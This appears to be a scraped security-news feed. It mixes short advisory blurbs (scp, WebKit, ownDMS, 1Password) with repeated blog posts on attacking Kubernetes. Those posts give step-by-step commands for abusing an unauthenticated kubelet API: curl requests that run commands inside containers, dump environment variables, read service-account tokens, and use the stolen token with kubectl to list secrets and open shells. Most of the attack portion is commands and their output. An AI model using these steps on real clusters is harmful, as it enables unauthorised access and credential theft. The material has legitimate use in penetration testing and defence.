EuskalHack Security Congress Fourth Edition is a new proposal from the EuskalHack Computer Security Association, with the aim to promote the community growth and the culture in the digital security field. As usual, in this new edition proximity to our public and technical quality will be our hallmarks. This exclusive conference is shaping up as the most relevant in Basque Country, with an estimated 180 attendees for this fourth edition. The participants include specialized companies, state security organizations, professionals, hobbyists and students in the area of security and Information Technology. The date for the conference is the 21st and 22nd of June 2019 in the lovely city of Donostia, San Sebastian.
Tags:

7:07
EuskalHack Security Congress IV Call For Papers
» ‎ Packet Storm Security Misc. Files

EuskalHack Security Congress Fourth Edition is a new proposal from the EuskalHack Computer Security Association, with the aim to promote the community growth and the culture in the digital security field. As usual, in this new edition proximity to our public and technical quality will be our hallmarks. This exclusive conference is shaping up as the most relevant in Basque Country, with an estimated 180 attendees for this fourth edition. The participants include specialized companies, state security organizations, professionals, hobbyists and students in the area of security and Information Technology. The date for the conference is the 21st and 22nd of June 2019 in the lovely city of Donostia, San Sebastian.
Tags:

7:04
SCP Server Verification Issues
» ‎ Packet Storm Security Advisories

Many scp clients fail to verify if the objects returned by the scp server match those it asked for. This issue dates back to 1983 and rcp, on which scp is based. A separate flaw in the client allows the target directory attributes to be changed arbitrarily. Finally, two vulnerabilities in clients may allow server to spoof the client output.
Tags:

7:04
SCP Server Verification Issues
» ‎ Packet Storm Security Recent Files

Many scp clients fail to verify if the objects returned by the scp server match those it asked for. This issue dates back to 1983 and rcp, on which scp is based. A separate flaw in the client allows the target directory attributes to be changed arbitrarily. Finally, two vulnerabilities in clients may allow server to spoof the client output.
Tags:

7:04
SCP Server Verification Issues
» ‎ Packet Storm Security Misc. Files

Many scp clients fail to verify if the objects returned by the scp server match those it asked for. This issue dates back to 1983 and rcp, on which scp is based. A separate flaw in the client allows the target directory attributes to be changed arbitrarily. Finally, two vulnerabilities in clients may allow server to spoof the client output.
Tags:

7:01
Scramjet Engines on the Long Road to Mach 5
» ‎ Hack a Day

When Charles “Chuck” Yeager reached a speed of Mach 1.06 while flying the Bell X-1 Glamorous Glennis in 1947, he became the first man to fly faster than the speed of sound in controlled level flight. Specifying that he reached supersonic speed “in controlled level flight” might seem superfluous, but it’s actually a very important distinction. There had been several unconfirmed claims that aircraft had hit or even exceeded Mach 1 during the Second World War, but it had always been during a steep dive and generally resulted in the loss of the aircraft and its pilot. Yeager’s accomplishment wasn’t …read more

Tags: current Events

6:44
WebKit JSC JIT Use-After-Free
» ‎ Packet Storm Security Exploits

The doesGC function simply takes a node, and tells if it might cause a garbage collection. This function is used to determine whether to insert write barriers. But it is missing some cases such as StringCharAt, StringCharCodeAt and GetByVal that might cause a garbage collection via rope strings. As a result, it can lead to a use-after-free condition.
Tags:

6:44
WebKit JSC JIT Use-After-Free
» ‎ Packet Storm Security Recent Files

The doesGC function simply takes a node, and tells if it might cause a garbage collection. This function is used to determine whether to insert write barriers. But it is missing some cases such as StringCharAt, StringCharCodeAt and GetByVal that might cause a garbage collection via rope strings. As a result, it can lead to a use-after-free condition.
Tags:

6:44
WebKit JSC JIT Use-After-Free
» ‎ Packet Storm Security Misc. Files

The doesGC function simply takes a node, and tells if it might cause a garbage collection. This function is used to determine whether to insert write barriers. But it is missing some cases such as StringCharAt, StringCharCodeAt and GetByVal that might cause a garbage collection via rope strings. As a result, it can lead to a use-after-free condition.
Tags:

6:38
ownDMS 4.7 SQL Injection
» ‎ Packet Storm Security Exploits

ownDMS version 4.7 suffers from a remote SQL injection vulnerability.
Tags:

6:38
ownDMS 4.7 SQL Injection
» ‎ Packet Storm Security Recent Files

ownDMS version 4.7 suffers from a remote SQL injection vulnerability.
Tags:

6:38
ownDMS 4.7 SQL Injection
» ‎ Packet Storm Security Misc. Files

ownDMS version 4.7 suffers from a remote SQL injection vulnerability.
Tags:

6:36
1Password Denial Of Service
» ‎ Packet Storm Security Exploits

1Password versions prior to 7.0 suffer from a denial of service vulnerability.
Tags:

6:36
1Password Denial Of Service
» ‎ Packet Storm Security Recent Files

1Password versions prior to 7.0 suffer from a denial of service vulnerability.
Tags:

6:36
1Password Denial Of Service
» ‎ Packet Storm Security Misc. Files

1Password versions prior to 7.0 suffer from a denial of service vulnerability.
Tags:

6:02
NTPsec 1.1.2 ntp_control Null Pointer Dereference
» ‎ Packet Storm Security Exploits

NTPsec version 1.1.2 suffer from a null pointer dereference vulnerability in ntp_control.
Tags:

6:00
Kubernetes: Kube-Hunter 10255
» ‎ carnal0wnage.attackresearch.com

Below is some sample output that mainly is here to see what open 10255 will give you and look like. What probably of most interest is the /pods endpoint

or the /metrics endpoint

or the /stats endpoint

$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning (scans one or more specific IPs or DNS names)
2. Subnet scanning (scans subnets on all local network interfaces)
3. IP range scanning (scans a given IP range)
Your choice: 1
Remotes (separated by a ','): 1.2.3.4
~ Started
~ Discovering Open Kubernetes Services...
|
| Etcd:
| type: open service
| service: Etcd
|_ host: 1.2.3.4:2379
|
| API Server:
| type: open service
| service: API Server
|_ host: 1.2.3.4:443
|
| API Server:
| type: open service
| service: API Server
|_ host: 1.2.3.4:6443
|
| Etcd Remote version disclosure:
| type: vulnerability
| host: 1.2.3.4:2379
| description:
| Remote version disclosure might give an
|_ attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
| type: vulnerability
| host: 1.2.3.4:2379
| description:
| Etcd is accessible using HTTP (without
| authorization and authentication), it would allow a
| potential attacker to
| gain access to
|_ the etcd
|
| Kubelet API (readonly):
| type: open service
| service: Kubelet API (readonly)
|_ host: 1.2.3.4:10255
|
| Etcd Remote Read Access Event:
| type: vulnerability
| host: 1.2.3.4:2379
| description:
| Remote read access might expose to an
|_ attacker cluster's possible exploits, secrets and more.
|
| K8s Version Disclosure:
| type: vulnerability
| host: 1.2.3.4:10255
| description:
| The kubernetes version could be obtained
|_ from logs in the /metrics endpoint
|
| Privileged Container:
| type: vulnerability
| host: 1.2.3.4:10255
| description:
| A Privileged container exist on a node.
| could expose the node/cluster to unwanted root
|_ operations
|
| Cluster Health Disclosure:
| type: vulnerability
| host: 1.2.3.4:10255
| description:
| By accessing the open /healthz handler, an
| attacker could get the cluster health state without
|_ authenticating
|
| Exposed Pods:
| type: vulnerability
| host: 1.2.3.4:10255
| description:
| An attacker could view sensitive information
| about pods that are bound to a Node using
|_ the /pods endpoint

----------

Nodes
+-------------+---------------+
| TYPE | LOCATION |
+-------------+---------------+
| Node/Master | 1.2.3.4 |
+-------------+---------------+

Detected Services
+----------------------+---------------------+----------------------+
| SERVICE | LOCATION | DESCRIPTION |
+----------------------+---------------------+----------------------+
| Kubelet API | 1.2.3.4:10255 | The read-only port |
| (readonly) | | on the kubelet |
| | | serves health |
| | | probing endpoints, |
| | | and is relied upon |
| | | by many kubernetes |
| | | componenets |
+----------------------+---------------------+----------------------+
| Etcd | 1.2.3.4:2379 | Etcd is a DB that |
| | | stores cluster's |
| | | data, it contains |
| | | configuration and |
| | | current state |
| | | information, and |
| | | might contain |
| | | secrets |
+----------------------+---------------------+----------------------+
| API Server | 1.2.3.4:6443 | The API server is in |
| | | charge of all |
| | | operations on the |
| | | cluster. |
+----------------------+---------------------+----------------------+
| API Server | 1.2.3.4:443 | The API server is in |
| | | charge of all |
| | | operations on the |
| | | cluster. |
+----------------------+---------------------+----------------------+

Vulnerabilities
+---------------------+----------------------+----------------------+----------------------+----------------------+
| LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379 | Unauthenticated | Etcd is accessible | Etcd is accessible | {"etcdserver":"2.3.8 |
| | Access | using insecure | using HTTP (without | ","etcdcluster":"2.3 |
| | | connection (HTTP) | authorization and | ... |
| | | | authentication), it | |
| | | | would allow a | |
| | | | potential attacker | |
| | | | to | |
| | | | gain access to | |
| | | | the etcd | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379 | Information | Etcd Remote version | Remote version | {"etcdserver":"2.3.8 |
| | Disclosure | disclosure | disclosure might | ","etcdcluster":"2.3 |
| | | | give an attacker a | ... |
| | | | valuable data to | |
| | | | attack a cluster | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255 | Information | K8s Version | The kubernetes | v1.5.6-rc17 |
| | Disclosure | Disclosure | version could be | |
| | | | obtained from logs | |
| | | | in the /metrics | |
| | | | endpoint | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255 | Information | Exposed Pods | An attacker could | count: 68 |
| | Disclosure | | view sensitive | |
| | | | information about | |
| | | | pods that are bound | |
| | | | to a Node using the | |
| | | | /pods endpoint | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255 | Information | Cluster Health | By accessing the | status: ok |
| | Disclosure | Disclosure | open /healthz | |
| | | | handler, an attacker | |
| | | | could get the | |
| | | | cluster health state | |
| | | | without | |
| | | | authenticating | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379 | Access Risk | Etcd Remote Read | Remote read access | {"action":"get","nod |
| | | Access Event | might expose to an | e":{"dir":true,"node |
| | | | attacker cluster's | ... |
| | | | possible exploits, | |
| | | | secrets and more. | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255 | Access Risk | Privileged Container | A Privileged | pod: node-exporter- |
| | | | container exist on a | 1fmd9-z9685, |
| | | | node. could expose | containe... |
| | | | the node/cluster to | |
| | | | unwanted root | |
| | | | operations | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
Tags:
6:00
Kubernetes: unauth kublet API 10250 token theft & kubectl
» ‎ carnal0wnage.attackresearch.com

Kubernetes: unauthenticated kublet API (10250) token theft & kubectl access & exec

kube-hunter output to get us started:

do a curl -s https://k8-node:10250/runningpods/ to get a list of running pods

With that data, you can craft your post request to exec within a pod so we can poke around.

Example request:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /"

Output:
total 35264
drwxr-xr-x 1 root root 4096 Nov 9 16:27 .
drwxr-xr-x 1 root root 4096 Nov 9 16:27 ..
-rwxr-xr-x 1 root root 0 Nov 9 16:27 .dockerenv
drwxr-xr-x 2 root root 4096 Nov 9 16:27 bin
drwxr-xr-x 5 root root 380 Nov 9 16:27 dev
-rwxr-xr-x 1 root root 36047205 Apr 13 2018 dnsmasq-nanny
drwxr-xr-x 1 root root 4096 Nov 9 16:27 etc
drwxr-xr-x 2 root root 4096 Jan 9 2018 home
drwxr-xr-x 5 root root 4096 Nov 9 16:27 lib
drwxr-xr-x 5 root root 4096 Nov 9 16:27 media
drwxr-xr-x 2 root root 4096 Jan 9 2018 mnt
dr-xr-xr-x 134 root root 0 Nov 9 16:27 proc
drwx------ 2 root root 4096 Jan 9 2018 root
drwxr-xr-x 2 root root 4096 Jan 9 2018 run
drwxr-xr-x 2 root root 4096 Nov 9 16:27 sbin
drwxr-xr-x 2 root root 4096 Jan 9 2018 srv
dr-xr-xr-x 12 root root 0 Dec 19 19:06 sys
drwxrwxrwt 1 root root 4096 Nov 9 17:00 tmp
drwxr-xr-x 7 root root 4096 Nov 9 16:27 usr
drwxr-xr-x 1 root root 4096 Nov 9 16:27 var

Check the env and see if the kublet tokens are in the environment variables. depending on the cloud provider or hosting provider they are sometimes right there. Otherwise we need to retrieve them from:
1. the mounted folder
2. the cloud metadata url

Check the env with the following command:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=env"

We are looking for the KUBLET_CERT, KUBLET_KEY, & CA_CERT environment variables.

We are also looking for the kubernetes API server. This is most likely NOT the host you are messing with on 10250. We are looking for something like:
KUBERNETES_PORT=tcp://10.10.10.10:443
or
KUBERNETES_MASTER_NAME: 10.11.12.13:443
Once we get the kubernetes tokens or keys we need to talk to the API server to use them. The kublet (10250) wont know what to do with them. This may be (if we are lucky) another public IP or a 10. IP. If it's a 10. IP we need to download kubectl to the pod.
Assuming it's not in the environment variables let's look and see if they are there in the mounted secrets
curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=mount"
sample output truncated:cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,commit=30,data=ordered)/dev/sda1 on /etc/k8s/dns/dnsmasq-nanny type ext4 (rw,relatime,commit=30,data=ordered)tmpfs on /var/run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)/dev/sda1 on /etc/resolv.conf type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)/dev/sda1 on /etc/hostname type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)/dev/sda1 on /etc/hosts type ext4 (rw,relatime,commit=30,data=ordered)shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
We can then cat out the ca.cert, namespace, and token
curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /var/run/secrets/kubernetes.io/serviceaccount"
Output:
total 4drwxrwxrwt 3 root root 140 Nov 9 16:27 .drwxr-xr-x 3 root root 4.0K Nov 9 16:27 ..lrwxrwxrwx 1 root root 13 Nov 9 16:27 ca.crt -> ..data/ca.crtlrwxrwxrwx 1 root root 16 Nov 9 16:27 namespace -> ..data/namespacelrwxrwxrwx 1 root root 12 Nov 9 16:27 token -> ..data/token
and then:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"

output:

eyJhbGciOiJSUzI1NiI---SNIP---

Also grab the ca.crt :-)

With the token, ca.crt and api server IP address we can issue commands with kubectl.

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get pods --all-namespaces

Output:

NAMESPACE NAME READY STATUS RESTARTS AGE
kube-system event-exporter-v0.1.9-5c-SNIP 2/2 Running 2 120d
kube-system fluentd-cloud-logging-gke-eeme-api-default-pool 1/1 Running 1 2y
kube-system heapster-v1.5.2-5-SNIP 3/3 Running 0 27d
kube-system kube-dns-5b8-SNIP 4/4 Running 0 61d
kube-system kube-dns-autoscaler-2-SNIP 1/1 Running 1 252d
kube-system kube-proxy-gke-eeme-api-default-pool 1/1 Running 1 2y
kube-system kubernetes-dashboard-7-SNIP 1/1 Running 0 27d
kube-system l7-default-backend-10-SNIP 1/1 Running 0 27d
kube-system metrics-server-v0.2.1-7-SNIP 2/2 Running 0 120d

at this point you can pull secrets or exec into any available pods

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get secrets --all-namespaces

to get a shell via kubectl

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get pods --namespace=kube-system

NAME READY STATUS RESTARTS AGE
event-exporter-v0.1.9-5-SNIP 2/2 Running 2 120d
--SNIP--
metrics-server-v0.2.1-7f8ee58c8f-ab13f 2/2 Running 0 120d

$ kubectl exec -it metrics-server-v0.2.1-7f8ee58c8f-ab13f --namespace=kube-system--server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- /bin/sh

/ # ls -lah
total 40220
drwxr-xr-x 1 root root 4.0K Sep 11 07:25 .
drwxr-xr-x 1 root root 4.0K Sep 11 07:25 ..
-rwxr-xr-x 1 root root 0 Sep 11 07:25 .dockerenv
drwxr-xr-x 3 root root 4.0K Sep 11 07:25 apiserver.local.config
drwxr-xr-x 2 root root 12.0K Sep 11 07:24 bin
drwxr-xr-x 5 root root 380 Sep 11 07:25 dev
drwxr-xr-x 1 root root 4.0K Sep 11 07:25 etc
drwxr-xr-x 2 nobody nogroup 4.0K Nov 1 2017 home
-rwxr-xr-x 2 root root 39.2M Dec 20 2017 metrics-server
dr-xr-xr-x 135 root root 0 Sep 11 07:25 proc
drwxr-xr-x 1 root root 4.0K Dec 19 21:33 root
dr-xr-xr-x 12 root root 0 Dec 19 19:06 sys
drwxrwxrwt 1 root root 4.0K Oct 18 13:57 tmp
drwxr-xr-x 3 root root 4.0K Sep 11 07:24 usr
drwxr-xr-x 1 root root 4.0K Sep 11 07:25 var

For completeness if you got the keys via the environment variables the kubectl command would be something like this:

kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --client-key=kublet.key --client-certificate=kublet.crt get pods --all-namespaces

Tags:
6:00
Kubernetes: unauth kublet API 10250 basic code exec
» ‎ carnal0wnage.attackresearch.com

Unauth API access (10250)

Most Kubernetes deployments provide authentication for this port. But it’s still possible to expose it inadvertently and it's still pretty common to find it exposed via the "insecure API service" option.

Everybody who has access to the service kubelet port (10250), even without a certificate, can execute any command inside the container.
# /run/%namespace%/%pod_name%/%container_name%
example:
$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /"
total 12drwxr-xr-x 13 root root 148 Aug 26 11:31 .drwxr-xr-x 13 root root 148 Aug 26 11:31 ..-rwxr-xr-x 1 root root 0 Aug 26 11:31 .dockerenvdrwxr-xr-x 2 root root 8192 May 5 22:22 bindrwxr-xr-x 5 root root 380 Aug 26 11:31 devdrwxr-xr-x 3 root root 135 Aug 26 11:31 etcdrwxr-xr-x 2 nobody nogroup 6 Mar 18 16:38 homedrwxr-xr-x 2 root root 6 Apr 23 11:17 libdr-xr-xr-x 353 root root 0 Aug 26 07:14 procdrwxr-xr-x 2 root root 6 Mar 18 16:38 rootdr-xr-xr-x 13 root root 0 Aug 26 15:12 sysdrwxrwxrwt 2 root root 6 Mar 18 16:38 tmpdrwxr-xr-x 4 root root 31 Apr 23 11:17 usrdrwxr-xr-x 5 root root 41 Aug 26 11:31 var

Here is how to get all secrets which container uses (environment variables - commons to see kublet tokens here):
$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system//" -d "cmd=env"
The list of all pods and containers which were scheduled on the Kubernetes worker node could be retrieved using command below:
$ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.tool
or
$ curl --insecure https://k8s-node-1:10250/runningpods | jq

Example 1:
curl --insecure https://1.2.3.4:10250/runningpods | jq
Output:
Forbidden (user=system:anonymous, verb=create, resource=nodes, subresource=proxy)
Example 2:curl --insecure https://1.2.3.4:10250/runningpods | jq
Output:
Unauthorized
Example 3:
curl --insecure https://1.2.3.4:10250/runningpods | jq

Output:
{ "kind": "PodList", "apiVersion": "v1", "metadata": {}, "items": [ { "metadata": { "name": "kube-dns-5b8bf6c4f4-k5n2g", "generateName": "kube-dns-5b8bf6c4f4-", "namespace": "kube-system", "selfLink": "/api/v1/namespaces/kube-system/pods/kube-dns-5b8bf6c4f4-k5n2g", "uid": "63438841-e43c-11e8-a104-42010a80038e", "resourceVersion": "85366060", "creationTimestamp": "2018-11-09T16:27:44Z", "labels": { "k8s-app": "kube-dns", "pod-template-hash": "1646927090" }, "annotations": { "kubernetes.io/config.seen": "2018-11-09T16:27:44.990071791Z", "kubernetes.io/config.source": "api", "scheduler.alpha.kubernetes.io/critical-pod": "" }, "ownerReferences": [ { "apiVersion": "extensions/v1beta1", "kind": "ReplicaSet", "name": "kube-dns-5b8bf6c4f4", "uid": "633db9d4-e43c-11e8-a104-42010a80038e", "controller": true } ] }, "spec": { "volumes": [ { "name": "kube-dns-config", "configMap": { "name": "kube-dns", "defaultMode": 420 } }, { "name": "kube-dns-token-xznw5", "secret": { "secretName": "kube-dns-token-xznw5", "defaultMode": 420 } } ], "containers": [ { "name": "dnsmasq", "image": "gcr.io/google-containers/k8s-dns-dnsmasq-nanny-amd64:1.14.10", "args": [ "-v=2", "-logtostderr", "-configDir=/etc/k8s/dns/dnsmasq-nanny", "-restartDnsmasq=true", "--", "-k", "--cache-size=1000", "--no-negcache", "--log-facility=-", "--server=/cluster.local/127.0.0.1#10053", "--server=/in-addr.arpa/127.0.0.1#10053", "--server=/ip6.arpa/127.0.0.1#10053" ], "ports": [ { "name": "dns", "containerPort": 53, "protocol": "UDP" }, { "name": "dns-tcp", "containerPort": 53, "protocol": "TCP" } ], "resources": { "requests": { "cpu": "150m", "memory": "20Mi" } }, "volumeMounts": [ { "name": "kube-dns-config", "mountPath": "/etc/k8s/dns/dnsmasq-nanny" }, { "name": "kube-dns-token-xznw5", "readOnly": true, "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount" } ], "livenessProbe": { "httpGet": { "path": "/healthcheck/dnsmasq", "port": 10054, "scheme": "HTTP" }, "initialDelaySeconds": 60, "timeoutSeconds": 5, "periodSeconds": 10, "successThreshold": 1, "failureThreshold": 5 }, "terminationMessagePath": "/dev/termination-log", "imagePullPolicy": "IfNotPresent" }, --------SNIP---------
With the output of the running pods command you can craft your command to do the code exec
$ curl -k -XPOST "https://k8s-node-1:10250/run///" -d "cmd=env"
as an example:

leaves you with:
curl -k -XPOST "https://kube-node-here:10250/run/kube-system/kube-dns-5b8bf6c4f4-k5n2g/dnsmasq" -d "cmd=ls -la /"
total 35264drwxr-xr-x 1 root root 4096 Nov 9 16:27 .drwxr-xr-x 1 root root 4096 Nov 9 16:27 ..-rwxr-xr-x 1 root root 0 Nov 9 16:27 .dockerenvdrwxr-xr-x 2 root root 4096 Nov 9 16:27 bindrwxr-xr-x 5 root root 380 Nov 9 16:27 dev-rwxr-xr-x 1 root root 36047205 Apr 13 2018 dnsmasq-nannydrwxr-xr-x 1 root root 4096 Nov 9 16:27 etcdrwxr-xr-x 2 root root 4096 Jan 9 2018 homedrwxr-xr-x 5 root root 4096 Nov 9 16:27 libdrwxr-xr-x 5 root root 4096 Nov 9 16:27 mediadrwxr-xr-x 2 root root 4096 Jan 9 2018 mntdr-xr-xr-x 125 root root 0 Nov 9 16:27 procdrwx------ 2 root root 4096 Jan 9 2018 rootdrwxr-xr-x 2 root root 4096 Jan 9 2018 rundrwxr-xr-x 2 root root 4096 Nov 9 16:27 sbindrwxr-xr-x 2 root root 4096 Jan 9 2018 srvdr-xr-xr-x 12 root root 0 Nov 9 16:27 sysdrwxrwxrwt 1 root root 4096 Nov 9 17:00 tmpdrwxr-xr-x 7 root root 4096 Nov 9 16:27 usrdrwxr-xr-x 1 root root 4096 Nov 9 16:27 var
Tags:

6:00
Kubernetes: Kube-Hunter 10255
» ‎ Carnal0wnage

Below is some sample output that mainly is here to see what open 10255 will give you and look like. What probably of most interest is the /pods endpoint

or the /metrics endpoint

or the /stats endpoint

$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning (scans one or more specific IPs or DNS names)
2. Subnet scanning (scans subnets on all local network interfaces)
3. IP range scanning (scans a given IP range)
Your choice: 1
Remotes (separated by a ','): 1.2.3.4
~ Started
~ Discovering Open Kubernetes Services...
|
| Etcd:
| type: open service
| service: Etcd
|_ host: 1.2.3.4:2379
|
| API Server:
| type: open service
| service: API Server
|_ host: 1.2.3.4:443
|
| API Server:
| type: open service
| service: API Server
|_ host: 1.2.3.4:6443
|
| Etcd Remote version disclosure:
| type: vulnerability
| host: 1.2.3.4:2379
| description:
| Remote version disclosure might give an
|_ attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
| type: vulnerability
| host: 1.2.3.4:2379
| description:
| Etcd is accessible using HTTP (without
| authorization and authentication), it would allow a
| potential attacker to
| gain access to
|_ the etcd
|
| Kubelet API (readonly):
| type: open service
| service: Kubelet API (readonly)
|_ host: 1.2.3.4:10255
|
| Etcd Remote Read Access Event:
| type: vulnerability
| host: 1.2.3.4:2379
| description:
| Remote read access might expose to an
|_ attacker cluster's possible exploits, secrets and more.
|
| K8s Version Disclosure:
| type: vulnerability
| host: 1.2.3.4:10255
| description:
| The kubernetes version could be obtained
|_ from logs in the /metrics endpoint
|
| Privileged Container:
| type: vulnerability
| host: 1.2.3.4:10255
| description:
| A Privileged container exist on a node.
| could expose the node/cluster to unwanted root
|_ operations
|
| Cluster Health Disclosure:
| type: vulnerability
| host: 1.2.3.4:10255
| description:
| By accessing the open /healthz handler, an
| attacker could get the cluster health state without
|_ authenticating
|
| Exposed Pods:
| type: vulnerability
| host: 1.2.3.4:10255
| description:
| An attacker could view sensitive information
| about pods that are bound to a Node using
|_ the /pods endpoint

----------

Nodes
+-------------+---------------+
| TYPE | LOCATION |
+-------------+---------------+
| Node/Master | 1.2.3.4 |
+-------------+---------------+

Detected Services
+----------------------+---------------------+----------------------+
| SERVICE | LOCATION | DESCRIPTION |
+----------------------+---------------------+----------------------+
| Kubelet API | 1.2.3.4:10255 | The read-only port |
| (readonly) | | on the kubelet |
| | | serves health |
| | | probing endpoints, |
| | | and is relied upon |
| | | by many kubernetes |
| | | componenets |
+----------------------+---------------------+----------------------+
| Etcd | 1.2.3.4:2379 | Etcd is a DB that |
| | | stores cluster's |
| | | data, it contains |
| | | configuration and |
| | | current state |
| | | information, and |
| | | might contain |
| | | secrets |
+----------------------+---------------------+----------------------+
| API Server | 1.2.3.4:6443 | The API server is in |
| | | charge of all |
| | | operations on the |
| | | cluster. |
+----------------------+---------------------+----------------------+
| API Server | 1.2.3.4:443 | The API server is in |
| | | charge of all |
| | | operations on the |
| | | cluster. |
+----------------------+---------------------+----------------------+

Vulnerabilities
+---------------------+----------------------+----------------------+----------------------+----------------------+
| LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379 | Unauthenticated | Etcd is accessible | Etcd is accessible | {"etcdserver":"2.3.8 |
| | Access | using insecure | using HTTP (without | ","etcdcluster":"2.3 |
| | | connection (HTTP) | authorization and | ... |
| | | | authentication), it | |
| | | | would allow a | |
| | | | potential attacker | |
| | | | to | |
| | | | gain access to | |
| | | | the etcd | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379 | Information | Etcd Remote version | Remote version | {"etcdserver":"2.3.8 |
| | Disclosure | disclosure | disclosure might | ","etcdcluster":"2.3 |
| | | | give an attacker a | ... |
| | | | valuable data to | |
| | | | attack a cluster | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255 | Information | K8s Version | The kubernetes | v1.5.6-rc17 |
| | Disclosure | Disclosure | version could be | |
| | | | obtained from logs | |
| | | | in the /metrics | |
| | | | endpoint | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255 | Information | Exposed Pods | An attacker could | count: 68 |
| | Disclosure | | view sensitive | |
| | | | information about | |
| | | | pods that are bound | |
| | | | to a Node using the | |
| | | | /pods endpoint | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255 | Information | Cluster Health | By accessing the | status: ok |
| | Disclosure | Disclosure | open /healthz | |
| | | | handler, an attacker | |
| | | | could get the | |
| | | | cluster health state | |
| | | | without | |
| | | | authenticating | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379 | Access Risk | Etcd Remote Read | Remote read access | {"action":"get","nod |
| | | Access Event | might expose to an | e":{"dir":true,"node |
| | | | attacker cluster's | ... |
| | | | possible exploits, | |
| | | | secrets and more. | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255 | Access Risk | Privileged Container | A Privileged | pod: node-exporter- |
| | | | container exist on a | 1fmd9-z9685, |
| | | | node. could expose | containe... |
| | | | the node/cluster to | |
| | | | unwanted root | |
| | | | operations | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
Tags: cloud
6:00
Kubernetes: unauth kublet API 10250 token theft & kubectl
» ‎ Carnal0wnage

Kubernetes: unauthenticated kublet API (10250) token theft & kubectl access & exec

kube-hunter output to get us started:

do a curl -s https://k8-node:10250/runningpods/ to get a list of running pods

With that data, you can craft your post request to exec within a pod so we can poke around.

Example request:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /"

Output:
total 35264
drwxr-xr-x 1 root root 4096 Nov 9 16:27 .
drwxr-xr-x 1 root root 4096 Nov 9 16:27 ..
-rwxr-xr-x 1 root root 0 Nov 9 16:27 .dockerenv
drwxr-xr-x 2 root root 4096 Nov 9 16:27 bin
drwxr-xr-x 5 root root 380 Nov 9 16:27 dev
-rwxr-xr-x 1 root root 36047205 Apr 13 2018 dnsmasq-nanny
drwxr-xr-x 1 root root 4096 Nov 9 16:27 etc
drwxr-xr-x 2 root root 4096 Jan 9 2018 home
drwxr-xr-x 5 root root 4096 Nov 9 16:27 lib
drwxr-xr-x 5 root root 4096 Nov 9 16:27 media
drwxr-xr-x 2 root root 4096 Jan 9 2018 mnt
dr-xr-xr-x 134 root root 0 Nov 9 16:27 proc
drwx------ 2 root root 4096 Jan 9 2018 root
drwxr-xr-x 2 root root 4096 Jan 9 2018 run
drwxr-xr-x 2 root root 4096 Nov 9 16:27 sbin
drwxr-xr-x 2 root root 4096 Jan 9 2018 srv
dr-xr-xr-x 12 root root 0 Dec 19 19:06 sys
drwxrwxrwt 1 root root 4096 Nov 9 17:00 tmp
drwxr-xr-x 7 root root 4096 Nov 9 16:27 usr
drwxr-xr-x 1 root root 4096 Nov 9 16:27 var

Check the env and see if the kublet tokens are in the environment variables. depending on the cloud provider or hosting provider they are sometimes right there. Otherwise we need to retrieve them from:
1. the mounted folder
2. the cloud metadata url

Check the env with the following command:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=env"

